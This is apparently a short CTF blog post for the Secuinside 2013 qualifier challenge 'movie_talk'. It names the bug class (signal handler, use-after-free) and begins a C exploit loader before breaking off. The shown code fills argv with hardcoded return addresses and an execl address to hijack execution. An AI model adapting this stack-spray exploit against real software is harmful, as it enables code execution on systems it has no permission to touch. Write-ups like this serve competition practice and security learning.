Secuinside CTF 2013 Qual - 17. movie_talk (Exploit only)
·
CTF/2013
Category : Pwnables Summary : signal handler, use-after-free, lift esp to argv loader.c #include #define RET "\xbb\x8b\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x90\x42\x0e\x40"#define BINARY "\x74\x81\x04\x08" // &"GNU" char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 ..